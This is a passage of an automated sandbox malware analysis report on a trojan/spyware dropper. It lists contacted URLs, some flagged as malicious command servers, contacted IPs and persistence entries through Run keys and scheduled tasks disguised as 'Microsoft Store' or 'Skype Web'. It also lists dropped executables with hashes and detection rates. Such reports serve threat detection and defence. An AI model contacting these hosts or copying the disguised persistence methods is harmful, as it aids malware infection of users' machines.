                                                                                              http://www.ccleaner.comYhttps://maxcazino.net/?faff=1449&sub=Cleaner62829258f111c_8df26f0c7d.exe, 00000016.00000003.605107164.000000000599C000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.644989284.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.647795129.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.647716380.0000000005822000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://ip-api.com/json/B6282925ab52f1_fdd12e5.exe, 00000018.00000000.365799796.0000000000578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://104.155.207.188/win.pac6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651273856.0000000002576000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineT4IoJqcAwY.exe, 00000000.00000003.253975148.00000000042A7000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.653019762.00000000025F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.namecheap.comT4IoJqcAwY.exe, 00000000.00000003.252388153.00000000039A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.653019762.00000000025F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://203.159.80.49/library.php62829258f111c_8df26f0c7d.exe, 00000016.00000003.429461424.0000000005A59000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        https://iplogger.org6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651650861.00000000025B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://iplogger.org/1RaBg7fMozilla/5.06282924fea1c3_82ebfc59.exe, 0000000B.00000002.649500041.0000000002451000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://iplogger.orgx6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651650861.00000000025B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.dk-soft.org/62829252dc457_91e450cbce.exe, 00000010.00000003.397602053.00000000021AD000.00000004.00001000.00020000.00000000.sdmp, 62829252dc457_91e450cbce.exe, 00000010.00000003.274743636.00000000024C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.haysoft.org%1-k62829252dc457_91e450cbce.exe, 00000010.00000003.397602053.00000000021AD000.00000004.00001000.00020000.00000000.sdmp, 62829252dc457_91e450cbce.exe, 00000010.00000003.274743636.00000000024C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		low
                                                                                                            https://ac.ecosia.org/autocomplete?q=6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.653019762.00000000025F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://iplogger.org6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651853256.00000000025C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://support.google.com/chrome/?p=plugin_shockwave6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://mingw-w64.sourceforge.net/XT4IoJqcAwY.exe, 00000000.00000003.254237079.0000000004307000.00000004.00001000.00020000.00000000.sdmp, setup_install.exe, 00000005.00000002.287268352.0000000064957000.00000008.00000001.01000000.00000005.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://g-cleanit.hk62829258f111c_8df26f0c7d.exe, 00000016.00000003.605107164.000000000599C000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.644989284.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.647795129.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.647716380.0000000005822000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://ip-api.com/json/sJ6282925ab52f1_fdd12e5.exe, 00000018.00000000.365799796.0000000000578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.653019762.00000000025F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://run-van-dan.xyzx6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651329884.0000000002584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.653019762.00000000025F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high

                                                                                                                          World Map of Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public IPs

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          41.41.255.235
                                                                                                                          		unknownEgypt
                                                                                                                          		8452TE-ASTE-ASEGtrue
                                                                                                                          203.159.80.49
                                                                                                                          		unknownNetherlands
                                                                                                                          		47987LOVESERVERSGBfalse
                                                                                                                          193.109.246.62
                                                                                                                          		unknownVirgin Islands (BRITISH)
                                                                                                                          		204343COMPUBYTE-ASRUtrue
                                                                                                                          104.21.40.196
                                                                                                                          		unknownUnited States
                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                          91.189.114.27
                                                                                                                          		unknownRussian Federation
                                                                                                                          		48287RU-CENTERRUtrue
                                                                                                                          103.147.182.42
                                                                                                                          		incricinfo.comunknown
                                                                                                                          		140038DHAKACOLO-AS-APDHAKACOLOPVTLIMITEDBDfalse
                                                                                                                          37.230.138.123
                                                                                                                          		unknownRussian Federation
                                                                                                                          		203674ROCKETTELECOM-ASRUfalse
                                                                                                                          5.101.153.227
                                                                                                                          		blackhk1.beget.techRussian Federation
                                                                                                                          		198610BEGET-ASRUfalse
                                                                                                                          208.95.112.1
                                                                                                                          		ip-api.comUnited States
                                                                                                                          		53334TUT-ASUSfalse
                                                                                                                          151.115.10.1
                                                                                                                          		s3.pl-waw.scw.cloudUnited Kingdom
                                                                                                                          		12876OnlineSASFRfalse
                                                                                                                          31.210.20.149
                                                                                                                          		unknownNetherlands
                                                                                                                          		61157PLUSSERVER-ASN1DEfalse
                                                                                                                          37.230.138.66
                                                                                                                          		unknownRussian Federation
                                                                                                                          		203674ROCKETTELECOM-ASRUfalse
                                                                                                                          172.67.188.70
                                                                                                                          		v.xyzgamev.comUnited States
                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                          208.91.197.91
                                                                                                                          		unknownVirgin Islands (BRITISH)
                                                                                                                          		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                                                          104.21.95.130
                                                                                                                          		unknownUnited States
                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                          148.251.234.83
                                                                                                                          		unknownGermany
                                                                                                                          		24940HETZNER-ASDEfalse
                                                                                                                          213.158.173.252
                                                                                                                          		unknownEgypt
                                                                                                                          		8452TE-ASTE-ASEGfalse
                                                                                                                          212.192.246.217
                                                                                                                          		unknownRussian Federation
                                                                                                                          		205220RHC-HOSTINGGBfalse
                                                                                                                          212.192.241.16
                                                                                                                          		unknownRussian Federation
                                                                                                                          		61269RAPMSB-ASRUfalse

                                                                                                                          Private

                                                                                                                          IP
                                                                                                                          192.168.2.1
                                                                                                                          127.0.0.127

                                                                                                                          General Information

                                                                                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                          Analysis ID:631543
                                                                                                                          Start date and time: 21/05/202209:29:062022-05-21 09:29:06 +02:00
                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                          Overall analysis duration:0h 16m 58s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Sample file name:T4IoJqcAwY.exe
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                          Number of analysed new started processes analysed:55
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:2
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • HDC enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@77/45@14/21
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 80%
                                                                                                                          HDC Information:
                                                                                                                          • Successful, ratio: 33.3% (good quality ratio 29.5%)
                                                                                                                          • Quality average: 75.1%
                                                                                                                          • Quality standard deviation: 33.8%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 96%
                                                                                                                          • Number of executed functions: 147
                                                                                                                          • Number of non-executed functions: 247
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Adjust boot time
                                                                                                                          • Enable AMSI
                                                                                                                          • Override analysis time to 240s for rundll32

                                                                                                                          Warnings

                                                                                                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                          • Excluded domains from analysis (whitelisted): toa.mygametoa.com, fs.microsoft.com, store-images.s-microsoft.com, arc.msn.com
                                                                                                                          • Execution Graph export aborted for target 6282924fea1c3_82ebfc59.exe, PID 3600 because there are no executed function
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          TimeTypeDescription
                                                                                                                          09:30:28API Interceptor22x Sleep call for process: powershell.exe modified
                                                                                                                          09:30:56API Interceptor1x Sleep call for process: 6282925ab52f1_fdd12e5.exe modified
                                                                                                                          09:31:02API Interceptor4x Sleep call for process: 62829251169ea_9dc91d.exe modified
                                                                                                                          09:32:42AutostartRun: HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce system recover "C:\Program Files (x86)\internet explorer\Fasaeshaxaji.exe"
                                                                                                                          09:32:43Task SchedulerRun new task: Firefox Default Browser Agent 7B8E28521EA2BEBE path: C:\Users\user\AppData\Roaming\ehcacig
                                                                                                                          09:32:49API Interceptor1x Sleep call for process: lBo5.exe modified
                                                                                                                          09:33:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Store C:\Users\user\AppData\Local\Temp\win64.exe
                                                                                                                          09:33:15API Interceptor2x Sleep call for process: 6282924fea1c3_82ebfc59.exe modified
                                                                                                                          09:33:25Task SchedulerRun new task: AdvancedUpdater path: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe s>/silentall -nofreqcheck -nogui
                                                                                                                          09:33:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Skype Web C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win64.exe
                                                                                                                          09:33:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Store C:\Users\user\AppData\Local\Temp\win64.exe
                                                                                                                          09:33:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Skype Web C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win64.exe

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          No context

                                                                                                                          Domains

                                                                                                                          No context

                                                                                                                          ASNs

                                                                                                                          No context

                                                                                                                          JA3 Fingerprints

                                                                                                                          No context

                                                                                                                          Dropped Files

                                                                                                                          No context

                                                                                                                          Created / dropped Files

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\6282924fea1c3_82ebfc59.exe.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1817
                                                                                                                          Entropy (8bit):5.36680764805585
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:MxHKVJHiYHKGD8Ao6+vxpNWAHKKPF1qHGiD0HKeGpH+jtHTG10:iq7CYqGgAo9ZPhqKPFwmI0qeoAtzG10
                                                                                                                          MD5:49728FF060B42F09CF5BC5DB8534BDDA
                                                                                                                          SHA1:8820BA53B9894E5CA0F3719D185ACC6F611C7D0B
                                                                                                                          SHA-256:2E62ACBB8A40C8903750E64DF770DDF1E5ED74A0ECA7985AC1D01E806B3BCBFD
                                                                                                                          SHA-512:6D17779E97E4848357061653CAA5CC132064C12E3E484CA82F2BDB89EB80070CF280BFD219960DC23F81EFA2797337EA6F6B572A28026A008A6272C0AE3A1AFD
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\f2e0589ed6d670f264a5f65dd0ad000f\Microsoft.VisualBasic.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\f2e3165e3c718b7ac302fea40614c984\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicK

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\fuckingdllENCR[1].dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94224
                                                                                                                          Entropy (8bit):7.998072640845361
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
                                                                                                                          MD5:418619EA97671304AF80EC60F5A50B62
                                                                                                                          SHA1:F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
                                                                                                                          SHA-256:EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
                                                                                                                          SHA-512:F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i*)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(*P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=|....'....[1.~.YB:./...A`...=..F..K...........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\D3[1].file

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):718848
                                                                                                                          Entropy (8bit):7.515568310796458
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:WteBoPwbYed82X+llRjyUX9Wq+Umjl8CCRjx0W6e/bgmq:W8okpy2X+H9JtWsmJ7CRjxTDW
                                                                                                                          MD5:E4D1C291BBC7E0F2B428D901A38C7C0A
                                                                                                                          SHA1:479E64491284E37FD5C6F6D309D38BBB2CF684EB
                                                                                                                          SHA-256:72C3EAE6E305CF23E5754986F486D824CFB0F6D3A11298346447F7E42CB97EC4
                                                                                                                          SHA-512:96AAF3E4D41EF358F40DFAFAC3C1DF6ADF4B87313199C76B01F11A4229B674259B6EF935F52F1BD5316E2EC63D2C47967714E5CC99F5243B5FAB9FAED6147D79
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: Metadefender, Detection: 51%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...v...v...v....F.w...h.E.d...h.T.6...h.S.....Q<..s...v......h.Z.w...h.D.w...h.A.w...Richv...........................PE..L....}.`.................P...................`....@.................................9M.......................................L..<.... ..................................................................@............................................text...RN.......P.................. ..`.data...h....`.......T..............@....rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\access[1].htm

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          File Type:very short file (no magic)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:U:U
                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:1

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\library[1].htm

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          File Type:very short file (no magic)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:V:V
                                                                                                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:0

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\ping[1].htm

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):17
                                                                                                                          Entropy (8bit):3.1751231351134614
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:nCmxEl:Cmc
                                                                                                                          MD5:064DB2A4C3D31A4DC6AA2538F3FE7377
                                                                                                                          SHA1:8F877AE1873C88076D854425221E352CA4178DFA
                                                                                                                          SHA-256:0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
                                                                                                                          SHA-512:CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:UwUoooIIrwgh24uuU

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\soft[1]

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2091639
                                                                                                                          Entropy (8bit):5.299126680636148
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:fdY03Sxby0GmTG2/mR6Trr2h6gPHOSmq3m4VWZRAxgA3F4mrZX:e71Zrr2h6gPHOnkJ0vA2ABp
                                                                                                                          MD5:87BD492E93D3001339566CAA2E15C319
                                                                                                                          SHA1:80D00CEE1F35ACEA147E5D81C8A798E56EFE2BA3
                                                                                                                          SHA-256:2CA2AF059F6720613BC64E49A6D5AF0E4046BB40E7AEE968B82CE3474171B932
                                                                                                                          SHA-512:92CC0997A5024E17D559E26972100BD1BD3C4DFEE408C73396204858EE9B987906F05E6F7EE19B1698DF39748AEAEE5B926762F677CFEE9AC0CE26AF6A2FDB46
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8,............"...0..............%... ...@....@.. ....................................`.................................T%..O....@..B....................`......8%............................................... ............... ..H............text........ ...................... ..`.rsrc...B....@......................@..@.reloc.......`......................@..B.................%......H.......T...,C......T........a............................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r[..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\D4[1].file

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          File Type:MS-DOS executable, MZ for MS-DOS
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1506304
                                                                                                                          Entropy (8bit):7.953802429674758
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:CKDJsmAQm9eF0v5VLrt/Cbqo7HGwW2R+pWzV1Y6xpZewrtgyc3yvEVDn:Bsom9e6v5V9bgHGHQdzceUutHEVj
                                                                                                                          MD5:293091DB2C858A21F85D123712A4BE3E
                                                                                                                          SHA1:9049B93C08D61DBD78BD0A4113D12CC348E784E1
                                                                                                                          SHA-256:AD7D2F6021A3513D6DE3A3F771AAEA5F21C6B4C3223C69FA532B5D13EB95974B
                                                                                                                          SHA-512:CF0242D814993AE8FD5217865820B206C83FF58FB95E0E2033BEA760218005879BFCC09381E0F5C0BA330C8E564A52F526AF3F626FC7589501FE9AA10AB7DC59
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 35%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L.....b..................)..<........:......0)...@...........................;.....+x........................................:.......:..J..........................................................................<.:..............................MPRESS1.p:..............................MPRESS2......:..........................rsrc....J....:..L..................@..............................................................................v2.19...... ..+.....X.M..R[I\U...VV.}.u...{.y6....qz.6...zU.j..J.>...<oB.....S..v9H.9....Q..\.$...W{S....H...S....v(.{.4....`'9..Lg..x.M1m.GOavL^......>C..A.?0.ErR0.&V..hZx..l........&...H`.........}...\.....H.....G@..n....[>i*.CW.0.M..V.Ir.q...);.G.O.z=K...D#.y.p)9.....J.T.?.J.+i.A.sU..2.b...]GCJ.:.C?*E.w!ZF..r.....+..6j.,....~.r.......K.Z..a.w..&.A.t..Z.3KH.....U...s<.B.,}0.Y..~...jF{+.z....Ir%Y..e..v.......T...........x....H.x*.....L..<T_.h.......5nS..;.a...W...M;

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\MIXONE[1].file

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):378880
                                                                                                                          Entropy (8bit):6.939587453869253
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:J6R+rSdqzfvSTkFCS/u0mH0EKvhbK1jH37jrx6D1hDKZvN:JYBUbvSgCS/uFHkbKJjrO1hK
                                                                                                                          MD5:DFBA5B77CDAF8B7A1D4811270E48500C
                                                                                                                          SHA1:389469C3AC3B13B5ECFEFC4869D991D1D030FCE1
                                                                                                                          SHA-256:865C4CAE53E47E108F85F063328E73ACAD8B9D0FD4916650DBB14B816CE82E65
                                                                                                                          SHA-512:68FF182C1FFE72771533F4D569F89948CF3AFB773309F03D757DCA3F5CCA5C8E47C82276E683191BF008CC72D6EB6F250B29BCC64F1FC9C69116BF500C0E5A3A
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
